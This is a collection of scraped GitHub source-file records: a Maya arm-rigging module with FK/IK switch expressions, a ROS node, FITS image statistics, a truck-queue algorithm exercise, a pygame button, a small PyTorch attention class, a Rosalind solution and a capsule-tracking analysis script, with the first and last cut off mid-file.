cmds.spaceLocator(n=\"%s_RotateLocator\"%self.FKHandCtl)\n self.pc = cmds.pointConstraint(self.FKHandCtl,self.FKHandRotLoc)\n cmds.delete(self.pc)\n cmds.parentConstraint(self.FKHandCtl,self.FKHandRotLoc)\n\n #シームレスなFKIKスイッチエクスプレッションを作成\n def createIKArmExpression(self,LR,switchCtlName):\n if LR == 1:LR = \"Left\"\n elif LR == 2:LR = \"Right\"\n if LR == \"Left\":\n self.ArmExpression = cmds.expression(n=\"%sFKArm_Expression\"%LR,ae=0,\\\n s=u'/*値をコネクト*/\\n'\n +'undoInfo -ock;\\n'\n +'%s.%sW1 = %s.%sArm_IK_FK;\\n'%(self.IKArmJointOC[0],self.IKArmJ,switchCtlName,LR)\n +'%s.%sW1 = %s.%sArm_IK_FK;\\n'%(self.IKForeArmJointOC[0],self.IKForeArmJ,switchCtlName,LR)\n +'%s.%sW1 = %s.%sArm_IK_FK;\\n\\n'%(self.IKHandJointOC[0],self.IKHandJ,switchCtlName,LR)\n\n +'if(%s.%sArm_IK_FK == 1){\\n'%(switchCtlName,LR)\n +u'/*ジョイントのベクトル値を取得*/\\n'\n +'vector $FKWpos = `xform -q -ws -t %s`;\\n'%self.FKArmJoint[0]\n +'vector $FKEpos = `xform -q -ws -t %s`;\\n'%self.FKArmJoint[1]\n +'vector $FKSpos = `xform -q -ws -t %s`;\\n'%self.FKArmJoint[2]\n +'vector $IKHand = `xform -q -ws -rp %s`;\\n'%self.IKArmCtlBlend\n +'vector $IKForeArm = `xform -q -ws -rp %s`;\\n'%self.IKForeArmCtlBlend\n +'vector $FKWrot = `getAttr \"%s.rotate\"`;\\n'%self.FKHandCtl\n +'vector $IKHandPos = $FKWpos - $IKHand;\\n\\n'\n\n +u'/*手のIKコントローラーを手のFKジョイントの位置に移動*/\\n'\n +'setAttr \"%s.translate\" ($IKHandPos.x)($IKHandPos.y)($IKHandPos.z);\\n'%self.IKArmCtl\n +'//string $pointC[] = `pointConstraint %s %s`;\\n'%(self.FKArmJoint[0],self.IKArmCtl)\n +'//string $orientC[] = `orientConstraint %s %s`;\\n'%(self.FKArmJoint[0],self.IKArmCtl)\n +'vector $IKHandRot = `getAttr \"%s.rotate\"`;\\n'%self.FKHandRotLoc[0]\n +'//delete $orientC;\\n'\n +'setAttr \"%s.rotate\" ($IKHandRot.x)($IKHandRot.y)($IKHandRot.z);\\n\\n'%self.IKArmCtl\n\n +u'/*ベクトルの計算*/\\n'\n +'vector $midp = ($FKWpos + $FKSpos)/2;\\n'\n +'vector $PVpos = $FKEpos - $midp;\\n'\n +'vector $polePos = 5*$PVpos + $midp;\\n'\n +'vector $IKForeArmPos = $polePos - $IKForeArm;\\n\\n'\n\n +u'/*肘のIKコントローラーを計算したベクトル位置に移動*/\\n'\n +'setAttr \"%s.translate\" ($IKForeArmPos.x)($IKForeArmPos.y)($IKForeArmPos.z);\\n'%self.IKForeArmCtl\n #+'select %s;\\n'%self.SwitchCtl\n +'}\\n\\n'\n\n +'else if(%s.%sArm_IK_FK == 0){\\n'%(switchCtlName,LR)\n +'vector $IKWpos = `getAttr \"%s.rotate\"`;\\n'%self.IKHandJ\n +'vector $IKEpos = `getAttr \"%s.rotate\"`;\\n'%self.IKForeArmJ\n +'vector $IKSpos = `getAttr \"%s.rotate\"`;\\n'%self.IKArmJ\n +'vector $ArmJointRotate = `getAttr \"%s.rotate\"`;\\n\\n'%self.FKArmJointRotate\n\n +'setAttr \"%s.rotate\" ($IKSpos.x - $ArmJointRotate.x)($IKSpos.y - $ArmJointRotate.y)($IKSpos.z - $ArmJointRotate.z);\\n'%self.FKArmCtl\n +'setAttr \"%s.rotate\" ($IKEpos.x)($IKEpos.y)($IKEpos.z);\\n'%self.FKForeArmCtl\n +'setAttr \"%s.rotate\" ($IKWpos.x)($IKWpos.y)($IKWpos.z);\\n'%self.FKHandCtl\n +'}\\n'\n +'undoInfo -cck;\\n')\n elif LR == \"Right\":\n self.ArmExpression = cmds.expression(n=\"%sFKArm_Expression\"%LR,ae=0,\\\n s=u'/*値をコネクト*/\\n'\n +'undoInfo -ock;\\n'\n +'%s.%sW1 = %s.%sArm_IK_FK;\\n'%(self.IKArmJointOC[0],self.IKArmJ,switchCtlName,LR)\n +'%s.%sW1 = %s.%sArm_IK_FK;\\n'%(self.IKForeArmJointOC[0],self.IKForeArmJ,switchCtlName,LR)\n +'%s.%sW1 = %s.%sArm_IK_FK;\\n\\n'%(self.IKHandJointOC[0],self.IKHandJ,switchCtlName,LR)\n\n +'if(%s.%sArm_IK_FK == 1){\\n'%(switchCtlName,LR)\n +u'/*ジョイントのベクトル値を取得*/\\n'\n +'vector $FKWpos = `xform -q -ws -t %s`;\\n'%self.FKArmJoint[0]\n +'vector $FKEpos = `xform -q -ws -t %s`;\\n'%self.FKArmJoint[1]\n +'vector $FKSpos = `xform -q -ws -t %s`;\\n'%self.FKArmJoint[2]\n +'vector $IKHand = `xform -q -ws -rp %s`;\\n'%self.IKArmCtlBlend\n +'vector $IKForeArm = `xform -q -ws -rp %s`;\\n'%self.IKForeArmCtlBlend\n +'vector $FKWrot = `getAttr \"%s.rotate\"`;\\n'%self.FKHandCtl\n +'vector $IKHandPos = $FKWpos - $IKHand;\\n\\n'\n\n +u'/*手のIKコントローラーを手のFKジョイントの位置に移動*/\\n'\n +'setAttr \"%s.translate\" ($IKHandPos.x)($IKHandPos.y)($IKHandPos.z);\\n'%self.IKArmCtl\n +'//string $pointC[] = `pointConstraint %s %s`;\\n'%(self.FKArmJoint[0],self.IKArmCtl)\n +'//string $orientC[] = `orientConstraint %s %s`;\\n'%(self.FKArmJoint[0],self.IKArmCtl)\n +'vector $IKHandRot = `getAttr \"%s.rotate\"`;\\n'%self.FKHandRotLoc[0]\n +'//delete $orientC;\\n'\n +'setAttr \"%s.rotate\" ($IKHandRot.x)($IKHandRot.y)($IKHandRot.z);\\n\\n'%self.IKArmCtl\n\n +u'/*ベクトルの計算*/\\n'\n +'vector $midp = ($FKWpos + $FKSpos)/2;\\n'\n +'vector $PVpos = $FKEpos - $midp;\\n'\n +'vector $polePos = 5*$PVpos + $midp;\\n'\n +'vector $IKForeArmPos = $polePos - $IKForeArm;\\n\\n'\n\n +u'/*肘のIKコントローラーを計算したベクトル位置に移動*/\\n'\n +'setAttr \"%s.translate\" ($IKForeArmPos.x)($IKForeArmPos.y)($IKForeArmPos.z);\\n'%self.IKForeArmCtl\n #+'select %s;\\n'%self.SwitchCtl\n +'}\\n\\n'\n\n +'else if(%s.%sArm_IK_FK == 0){\\n'%(switchCtlName,LR)\n +'vector $IKWpos = `getAttr \"%s.rotate\"`;\\n'%self.IKHandJ\n +'vector $IKEpos = `getAttr \"%s.rotate\"`;\\n'%self.IKForeArmJ\n +'vector $IKSpos = `getAttr \"%s.rotate\"`;\\n'%self.IKArmJ\n +'vector $ArmJointRotate = `getAttr \"%s.rotate\"`;\\n\\n'%self.FKArmJointRotate\n\n +'setAttr \"%s.rotate\" ($IKSpos.x - $ArmJointRotate.x)(($IKSpos.y - $ArmJointRotate.y)* -1)(($IKSpos.z - $ArmJointRotate.z)* -1);\\n'%self.FKArmCtl\n +'setAttr \"%s.rotate\" ($IKEpos.x)($IKEpos.y * -1)($IKEpos.z * -1);\\n'%self.FKForeArmCtl\n +'setAttr \"%s.rotate\" ($IKWpos.x)($IKWpos.y * -1)($IKWpos.z * -1);\\n'%self.FKHandCtl\n +'}\\n'\n +'undoInfo -cck;\\n')\n cmds.setAttr(self.IKForeArmCtl+\".translate\",0,0,0)\n\n #腕のコントローラーの階層分け\n def setArmCtlLayering(self):\n self.IKArmGP = cmds.group(self.IKForeArmCtlBlend,self.IKArmCtlBlend,name=\"IK%sArm_GP\"%self.LeftRight[0])\n self.IKArmJointRotate = cmds.group(self.IKForeArmCtlBlend,self.IKArmCtlBlend,name=\"IK%sArm_ArmJointRotate\"%self.LeftRight[0])\n self.ArmGP = cmds.group(self.FKShoulderJOffGP,name=\"%sArm_GP\"%self.LeftRight[0])\n cmds.xform(self.ArmGP,ws=True,piv = cmds.xform(self.FKArmJoint[-1],q=True,ws=True,rp=True))\n\n #cmds.makeIdentity(self.shoulderCtlOffset,apply=True,r=True)\n cmds.parent(self.IKArmGP,self.ArmGP)\n\n return self.ArmGP\n\n #腕のデフォルト回転値をセット\n def setDefaultRotateAttr(self,LR):\n self.getShoulderPivot = cmds.xform(self.System.getJointLabelType()[LR,10],q=True,ws=True,rp=True)\n cmds.xform(self.IKArmJointRotate,ws=True,piv = self.getShoulderPivot)\n cmds.setAttr(self.IKArmJointRotate+\".rotate\",*self.armRotateAttr[self.System.getJointLabelType()[LR,10]])\n cmds.setAttr(self.FKArmJointRotate+\".rotate\",*self.armRotateAttr[self.System.getJointLabelType()[LR,10]])\n\n #腕のFKIKスイッチコネクション\n def connectArmSwitch(self,LR,ArmAttrList):\n if LR == 1:self.LeftRight = ArmAttrList\n elif LR == 2:self.LeftRight = ArmAttrList\n \"肩のスイッチング\"\n self.reverse = cmds.shadingNode(\"reverse\",au=True,n=\"%s_reverse\"%self.FKArmJoint[2])\n #cmds.connectAttr(self.LeftRight,self.IKArmJointOC[0]+\".%sW1\"%self.IKArmJ,f=True)\n cmds.connectAttr(self.LeftRight,self.reverse+\".inputX\",f=True)\n cmds.connectAttr(self.reverse+\".outputX\",self.FKArmJointOC[0]+\".%sW0\"%self.FKArmJoint[2],f=True)\n \"肘のスイッチング\"\n #cmds.connectAttr(self.LeftRight,self.IKForeArmJointOC[0]+\".%sW1\"%self.IKForeArmJ,f=True)\n cmds.connectAttr(self.reverse+\".outputX\",self.FKForeArmJointOC[0]+\".%sW0\"%self.FKArmJoint[1],f=True)\n \"手のスイッチング\"\n #cmds.connectAttr(self.LeftRight,self.IKHandJointOC[0]+\".%sW1\"%self.IKHandJ,f=True)\n cmds.connectAttr(self.reverse+\".outputX\",self.FKHandJointOC[0]+\".%sW0\"%self.FKArmJoint[0],f=True)\n\n cmds.connectAttr(self.LeftRight,self.IKArmGP+\".visibility\",f=True)\n cmds.connectAttr(self.reverse+\".outputX\",self.FKArmGP+\".visibility\",f=True)\n\n #階層クラスに腕コントローラー\n def addArmCtlClass(self,LR):\n if LR == 1: TDCtlLayering.LeftArmIKGP = self.armIKGP\n elif LR == 2:TDCtlLayering.RightArmIKGP = self.armIKGP\n if LR == 1: TDCtlLayering.LeftArmGP = self.ArmGP\n elif LR == 2:TDCtlLayering.RightArmGP = self.ArmGP\n","repo_name":"pranawpradhan/TDModularRiggingSystem","sub_path":"modules/Arm.py","file_name":"Arm.py","file_ext":"py","file_size_in_byte":22086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16648132219","text":"#!/usr/bin/env python\nimport rospy\nimport math\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nfrom jedi.msg import PersonDistance\n\n\n\n\ndef distance (x1, y1, x2, y2):\n\txd = x1 -x2\n\tyd = y1 - y2\n\treturn math.sqrt(xd*xd + yd*yd)\n\nclass PersonMonitor(object):\n\tdef __init__(self, pub, people):\n\t\tself._pub = pub\n\t\tself._people = people\n\n\n\tdef callback(self, msg): \n\t\tx = msg.pose.pose.position.x\n\t\ty = msg.pose.pose.position.y\n\t\tclosest_name = None\n\t\tclosest_distance = None\n\t\tfor l_name, l_x, l_y in self._people:\n\t\t\tdist = distance(x,y, l_x, l_y)\n\t\t\tif closest_distance is None or dist < closest_distance:\n\t\t\t\tclosest_name\t= l_name\n\t\t\t\tclosest_distance = dist\n\t\tld = PersonDistance()\n\t\tld.name = closest_name\n\t\tld.distance = closest_distance\n\t\tself._pub.publish(ld)\t\t\n\t\t#rospy.loginfo('closest: {}'.format(closest_name))\n\t#do something with closest\n\n#rospy.loginfo('x: {}, y: {}'.format(x,y))\ndef main():\n\n\trospy.init_node('closest_person_node')\n\tpeople = []\n\t\n\tpeople.append((\"Person1\", -1.36, 6.3)); #Pessoa da sala inferior direita\n\tpeople.append((\"Person2\", 2.58, -1.07)); #Pessoa da sala superior direita\n\tpeople.append((\"Person3\", 2.31, 8.80)); #Pessoa na sala da esquerda\n\tpeople.append((\"Person4\", 3.12, 5.56)); #Pessoa da sala do meio superior\n\tpub = rospy.Publisher('closest_person', PersonDistance, queue_size=10)\n\tmonitor = PersonMonitor (pub, people)\n\t\n\trospy.Subscriber(\"/amcl_pose\", PoseWithCovarianceStamped, monitor.callback)\n\trospy.spin()\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"gasj3/jedi","sub_path":"scripts/closest_person_node.py","file_name":"closest_person_node.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"29873463418","text":"#!/usr/bin/python\n\nimport os, string\nimport numpy as np\nimport sys\n\nfrom astropy.io import fits\n\n# this script reads in fits image files and writes output giving statistics \n# about the image\n\n# get fits files\nfilenames = os.listdir(os.curdir)\nfor i in range(len(filenames)):\n# if '.FITS' in filenames[i] and '-2l_10' in filenames[i]:\n if '.fits' in filenames[i]: \n fitsimage = filenames[i]\n img = fits.getdata(fitsimage, ext=0)\n\n mindata=np.amin(img)\n maxdata=np.amax(img)\n\n minlocation=np.where(img==mindata)\n maxlocation=np.where(img==maxdata)\n# Content: minlocation[1] is array of x-coordinates where min occurs\n# Content: minlocation[0] is array of y-coordinates where min occurs\n# Content: minlocation[1][0] is the x-coordinate of the first occurrence of min\n# Content: minlocation[1][1] is the x-coordinate of the second occurrence of min\n\n sigma=np.std(img)\n\n# If more than one occurrence of min or max, print warning and list the number of occurrences.\n if (len(minlocation[0])>1):\n print('# ',fitsimage,len(minlocation[0]),' pixels at minimum ',mindata)\n\n if (len(maxlocation[0])>1):\n print('# ',fitsimage,len(maxlocation[0]),' pixels at maximum ',maxdata)\n\n if ((len(minlocation[0])==1) and (len(maxlocation[0])==1)):\n #print mindata,minlocation[0][0],len(minlocation[0])\n #print maxdata,maxlocation[0][0],\n print(\"%35s %10.4e %15.10e %5d %5d %15.10e %5d %5d %10.4e \" % (fitsimage,sigma,mindata,minlocation[1][0],minlocation[0][0],maxdata,maxlocation[1][0],maxlocation[0][0],((maxdata-mindata)/sigma)))\n\n\n","repo_name":"twillis449/SKA-simulations","sub_path":"imstat_all.py","file_name":"imstat_all.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15421532640","text":"# 백준 - 트럭 - 13335 - 구현, 큐, 시뮬레이션 문제\n'''\n구현, 큐, 시뮬레이션 문제\n\n프로그래머스의 '다리를 지나는 트럭' 이라는 문제랑 똑같은 문제이다.\n\n풀이 과정\n1. 현재 다리를 지나는 트럭을 확인하기 위해 temp_list 라는 이름을 가진 리스트 자료형 변수를 만든다.\n2. 문제의 입력으로 주어지는 트럭의 무게를 하나씩 꺼내면서 for 반복문을 실행한다.\n3. for 반복문 안 while 반복문으로 다리에 올려진 트럭이 없을 경우 (temp_list가 비어있을 경우) 트럭을 추가한다.\n 3.1 - temp_list의 len이 다리의 수(w)와 같다면 temp_list의 첫 번째 트럭을 뺀다.\n 3.2 - temp_list의 전체 합의 값이 다리의 최대하중 보다 크다면 시간(res)은 1 추가, temp_list엔 0을 추가한다.\n 3.3 - 작다면 temp_list(다리를 지나고 있는 트럭)에 i 값을 추가하고, res에 1을 더한다.\n4. 최종적으로 res를 출력할 때 전체 다리의 길이인 w를 더한 후 출력해야 된다.\n'''\n\nn, w, l = map(int, input().split())\nn_list = list(map(int, input().split()))\n\n# 테스트\n# n, w, l = 4, 2, 10\n# n_list = [7,4,5,6] # 8\n# n, w, l = 1, 100, 100\n# n_list = [10] # 101\n# n, w, l = 10, 100, 100\n# n_list = [10,10,10,10,10,10,10,10,10,10] # 110\n\nres = 0\ntemp_list = []\n\nfor i in n_list:\n while 1:\n if not temp_list:\n temp_list.append(i)\n res += 1\n break\n elif len(temp_list) == w:\n temp_list.pop(0)\n else:\n if sum(temp_list) + i > l:\n res += 1\n temp_list.append(0)\n else:\n temp_list.append(i)\n res += 1\n break\n\nprint(res + w)\n","repo_name":"rkdalsdn94/algoalgo","sub_path":"solved_ac/Silver_1/트럭_13335.py","file_name":"트럭_13335.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34780539903","text":"import pygame\n\n\nclass Button(pygame.sprite.Sprite):\n image_path = {\n \"default\": \"graphics/new_game_btn.png\",\n \"hover\": \"graphics/new_game_btn_hover.png\",\n }\n\n def __init__(self, game, pos, groups):\n super().__init__(groups)\n self.game = game\n self.image = pygame.image.load(self.image_path[\"default\"]).convert_alpha()\n self.rect = self.image.get_rect(topleft=pos)\n\n def update(self):\n if pygame.mouse.get_pressed()[0]:\n if self.rect.collidepoint(pygame.mouse.get_pos()):\n mouse_buttons_pressed = pygame.mouse.get_pressed()\n if self.game.last_mouse_buttons != mouse_buttons_pressed:\n # left click\n if mouse_buttons_pressed[0]:\n self.game.reset()\n\n if self.rect.collidepoint(pygame.mouse.get_pos()):\n self.image = pygame.image.load(self.image_path[\"hover\"]).convert_alpha()\n else:\n self.image = pygame.image.load(self.image_path[\"default\"]).convert_alpha()\n","repo_name":"tom-orrow/swine-mapper","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"23299060378","text":"import torch\nimport torch.nn as nn\n\nclass Attention(nn.Module):\n def __init__(self,din,dout):\n super(Attention, self).__init__()\n self.softmax = nn.Softmax(dim=-1)\n self.scale = din**-0.5\n self.q = nn.Linear(din,dout)\n self.k = nn.Linear(din,dout)\n self.v = nn.Linear(din,dout)\n\n def forward(self,x):\n q = self.q(x)\n k = self.k(x)\n v = self.v(x)\n score = torch.matmul(q,k.transpose(-2,-1))*self.scale\n score = self.softmax(score)\n out = torch.matmul(score,v)\n return out\n\nclass MultHeadSelfAttention(nn.Module):\n def __init__(self,dim_in,d_model,n_head):\n super(MultHeadSelfAttention, self).__init__()\n self.d_model = d_model\n self.n_head = n_head\n self.dim_in = dim_in\n self.scale = (d_model//n_head)**-0.5\n\n self.q = nn.Linear(dim_in,d_model)\n self.k = nn.Linear(dim_in,d_model)\n self.v = nn.Linear(dim_in,d_model)\n self.softmax = nn.Softmax(dim=-1)\n\n def forward(self,x):\n self.ndim = self.d_model//self.n_head\n q = self.q(x)\n k = self.k(x)\n v = self.v(x)\n\n\n\nnet = Attention(5,5)\nx = torch.randn(2,5,5)\nout = net(x)\nprint(out)","repo_name":"XuYiHan30319/MedicalImaging","sub_path":"AttentionNet/Attention.py","file_name":"Attention.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40947954138","text":"# http://rosalind.info/problems/iprb/\nfin = open('rosalind_iprb.txt', 'r')\nfout = open('iprb_out.txt', 'w+')\npopulation = fin.readline().split()\n\nprob = []\npopulation = [int(n) for n in population]\ns = sum(population)\n\nfor i in range(len(population)-1):\n\tfst = population[i]\n\tfor j in range(i,len(population)):\n\t\tscd = population[j]\n\t\tif i==j:\n\t\t\tprob.append((fst/s)*((scd-1)/(s-1)))\n\t\telse:\n\t\t\tprob.append(2*(fst/s)*(scd/(s-1)))\n\nprob[3] = prob[3]*(3/4)\nprob[4] = prob[4]*(1/2)\nfout.write(str(sum(prob)))\n\nfin.close()\nfout.close()\n","repo_name":"a5834929/UCLA-CM224_Computational_Genetics","sub_path":"Programming/iprb.py","file_name":"iprb.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3892827540","text":"import logging\n#logging.basicConfig(level=logging.DEBUG)\nlogging.basicConfig(\n filename=\"pizza.log\",\n level=logging.DEBUG,\n format=\"%(asctime)s:%(levelname)s:%(message)s\"\n )\nclass Pizza():\n def __init__(self,name,price):\n self.name = name\n self.price = price\n logging.debug(\"Pizza created: {} Rate : ${}\".format(self.name,self.price))\n\n def make(self,q= 1):\n logging.debug(\"Made : {} pizza(s)\".format(q,self.name))\n\n def eat(self,q=1):\n logging.debug(\"ate : {} pizza(s)\".format(q,self.name))\np1 = Pizza(\"BBQ chiken\",4)\np1.make()\np1.eat()\np2 = Pizza(\"Thousand islands\",5)\np2.make()\np2.eat()\n\n","repo_name":"hellstrikes13/sudipython","sub_path":"pizza_oo.py","file_name":"pizza_oo.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"27308605043","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 08 15:31:09 2016\n\n@author: mbbxkeh2\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n#import cv2\nimport matplotlib.pyplot as plt\nplt.close('all')\nimport numpy as np\n#import os\nimport sys\nsys.path.append('C:\\\\Users\\\\Edgar\\\\Dropbox\\\\PhD\\\\Python\\\\OpenCV\\\\capsule_tracking') #Machine Schuster G.21\nsys.path.append('C:\\\\Users\\\\mbbxkeh2\\\\Dropbox\\\\PhD\\\\Python\\\\OpenCV\\\\capsule_tracking') #Aland Turing 2.105\nsys.path.append('/home/magda/Dropbox/PhD/Python/OpenCV/capsule_tracking') #Aland Turing 2.105\n\nimport general as gen\nimport analysis as ana\nimport t_junction as tj\nimport ReadOutputFile as TJ_ROF\nimport ReadResultsFile as TJ_RRF\nimport track_capsule_TJ as TR\nimport CompareRuns as CP_TJ\n\n\ndef runfunc():\n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch170615-002\\\\T-Junction\\\\2015-06-22\\\\Batch170615-002_#2\\\\'\n # folder = 'Batch170615-002-#2-%dFPS-35mlPmin-2\\\\' %FPS\n \n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch170615-002\\\\T-Junction\\\\2015-06-20\\\\Batch170615-002_#5\\\\' \n # folder = 'Batch170615-002_#5_%dFPS_5mlPmin-1\\\\' %FPS\n \n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch270715-001\\\\T-Junction\\\\2015-08-04\\\\Batch270715-001-#5\\\\'\n # folder = 'Batch270715-001-#5-%dFPS-15mlPmin-4\\\\' %FPS\n \n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch040615-002\\\\T-Junction\\\\'\n \n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\GelBeads150715-1\\\\T-Junction\\\\2015-07-22\\\\GelBead150715-1-#4\\\\'\n # folder = 'GelBead150715-1-#4-%dFPS-35mlPmin-8\\\\' %FPS\n \n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch120615-004\\\\T-Junction\\\\'\n # folder = 'Batch120615-001-#4-%dFPS-5mlPmin-4\\\\' %FPS\n \n # \n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch260615-001\\\\T-Junction\\\\2015-07-01\\\\Batch260615-001-#17\\\\'\n # folder = 'Batch260615-001-#17-%dFPS-70mlPmin-1\\\\' %FPS\n \n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\GelBeads150730-1\\\\T-Junction\\\\2015-08-04\\\\GelBead150730-1-#1\\\\'\n # folder = 'GelBead150730-1-#1-%dFPS-35mlPmin-1\\\\' %FPS\n \n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch010615-001\\\\T-Junction\\\\Capsule#1\\\\'\n # folder = 'Batch010615-001_#1-030615-5kcSt-1S-%dFPS-70mlPmin-5\\\\' %FPS\n \n \n \n \n \n # centerline, width, pPmm, geometryTJ = None, None, None, None\n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\GelBeads150715-1\\\\T-Junction\\\\2015-07-22\\\\GelBead150715-1-#4\\\\'; geometryTJ=[35, 121, 535, 709] #GelBeads150715-1 \n # centerline, width, pPmm = 622, 174, 22.3; directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\GelBeads150715-1\\\\T-Junction\\\\2015-07-22\\\\GelBead150715-1-#4\\\\'; geometryTJ=[37, 121, 535, 709]; #GelBeads150715-1\n # folder = 'GelBead150715-1-#4-%dFPS-70mlPmin-7\\\\' %FPS\n # path=directory+folder\n # directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\GelBeads150730-1\\\\T-Junction\\\\2015-08-04\\\\GelBead150730-1-#1\\\\'; centerline, width, pPmm = 624.5, 175, 22.4; geometryTJ=[32, 119, 537, 712] #GelBeads150730-1 #11\n # directory = '/mnt/MCND/EdgarHaener/Capsules/GelBeads150730-1/T-Junction/2015-08-04/GelBead150730-1-#1/'; \n # path = '/mnt/MCND/EdgarHaener/Capsules/GelBeads150730-1/T-Junction/2015-08-04/GelBead150730-1-#1/GelBead150730-1-#1-10FPS-5mlPmin-1' #GelBeads150730-1 #1\n # centerline, width, pPmm = 646, 174, 22.3; geometryTJ=[28, 114, 559, 733] #Batch260615-001 #17\n \n # centerline, width, pPmm = 637, 175, 22.4; geometryTJ=[72, 159, 550, 725] #Batch120615-004 #4 15ml/min\n # centerline, width, pPmm = 637, 175, 22.4; geometryTJ=[35, 118, 549, 724] #Batch120615-004 #4 Other Runs\n # centerline, width, pPmm = 631.5, 175, 22.4; geometryTJ=[73, 158, 544, 719] #Batch170615-002 #5 5ml/min\n # centerline, width, pPmm = 632, 176, 22.4; geometryTJ=[34, 120, 543, 719] #Batch170615-002 #5 Other\n # geometryTJ=[33, 118, 541, 717] #Batch170615-002 #2\n # centerline, width, pPmm = 631, 174, 22.3; geometryTJ=[39, 125, 544, 718] #Batch010615-001 #1\n # centerline, width, pPmm = 623, 176, 22.5; geometryTJ=[120, 535, 711] #Batch270715-001 #5\n \n # centerline, width, pPmm = 628, 176, 22.6; geometryTJ=[119, 540, 716] #Batch100815-001-#8\n # centerline, width, pPmm = 633, 166, 20.2; geometryTJ=[105, 550, 716] #Batch100815-001 #6 & #7\n # centerline, width, pPmm = 634.5, 165, 20.2; geometryTJ=[105, 552, 717] #Batch100815-001 #3 & #4\n \n \n #geometryTJ = [Top Daugther Channel, Bottom Daugther Channel, left side Main Channel, right side Main Channel]\n\n #=============================================================================\n # GelBead150715-1\n #=============================================================================\n name4 = 'GelBead150715-1#1'\n \n centerline, width, pPmm = 622, 174, 22.3; geometryTJ=[37, 121, 535, 709]; #GelBeads150715-1\n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\GelBeads150715-1\\\\T-Junction\\\\2015-07-22\\\\GelBead150715-1-#4\\\\'; \n FPS=40; folder = 'Batch040615-002-#1-1S-5kcSt-%dFPS-70mlPmin-6\\\\' %FPS\n \n path = directory + folder #Test2\\\\'\n pathRESLT4 = directory + '2015-07-22-GelBead150715-1-#4_Results.txt'\n #=============================================================================\n \n #=============================================================================\n # Batch040615-002\n #=============================================================================\n name3 = 'Batch040615-002#1'\n \n \n centerline, width, pPmm3 = 635.5, 173, 22.2; geometryTJ=[36, 122, 549, 722] #\n \n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch040615-002\\\\T-Junction\\\\Capsule#1\\\\'\n FPS3=10; folder = 'Batch040615-002-#1-1S-5kcSt-%dFPS-5mlPmin-4\\\\' %FPS3\n \n path3 = directory + folder #Test2\\\\'\n pathRESLT3 = directory + 'T-Junction-Capsule#1_Results.txt'\n #=============================================================================\n \n #=============================================================================\n # Batch260615-001\n #=============================================================================\n name2 = 'Batch260615-001#17'\n \n centerline, width, pPmm2 = 646, 174, 22.3; geometryTJ2=[28, 114, 559, 733] #Batch260615-001 #17\n \n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch260615-001\\\\T-Junction\\\\2015-07-01\\\\Batch260615-001-#17\\\\'\n FPS2=140; folder = 'Batch260615-001-#17-%dFPS-70mlPmin-1\\\\' %FPS2\n \n path2 = directory + folder #Test2\\\\'\n pathRESLT2 = directory + '2015-07-01-Batch260615-001-#17_Results.txt'\n #=============================================================================\n \n #=============================================================================\n # Batch120615-004\n #=============================================================================\n name1 = 'Batch120615-004#4'\n \n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch120615-004\\\\T-Junction\\\\'\n FPS = 10; folder = 'Batch120615-001-#4-%dFPS-5mlPmin-4\\\\' %FPS\n FPS1 = 100; folder = 'Batch120615-001-#4-%dFPS-50mlPmin-1\\\\' %FPS1\n \n if FPS1 == 30:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[72, 159, 550, 725] #Batch120615-004 #4 15ml/min\n else:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[35, 118, 549, 724] #Batch120615-004 #4 Other Runs\n \n path1 = directory + folder #Test2\\\\'\n pathRESLT1 = directory + 'Batch120615-004-T-Junction_Results.txt'\n #=============================================================================\n \n \n \n \n #=============================================================================\n # Run stuff\n #=============================================================================\n \n sp = \"M:\\\\EdgarHaener\\\\Capsules\\\\PlotScripts\\\\T-Junction-RESLT\\\\\"\n \n #tj.tryout(directory)\n #tj.averageTrajectories(directory = directory,\n # savePath = sp, \n # pPmm = pPmm, \n # batchName = name, \n # forPub=False)\n \n \n # Plot Trajectory\n# tj.plotTrajecotry(path = path, pPmm=pPmm, geometryTJ = geometryTJ, savepath = sp, forPub=True)\n# commandsToGeneratePlotsForThesis()\n# areaAndPerimeter(sp)\n \n TJ1 = TJ_RRF.ResultsClass(pathRESLT1)\n TJ2 = TJ_RRF.ResultsClass(pathRESLT2)\n TJ3 = TJ_RRF.ResultsClass(pathRESLT3)\n TJ4 = 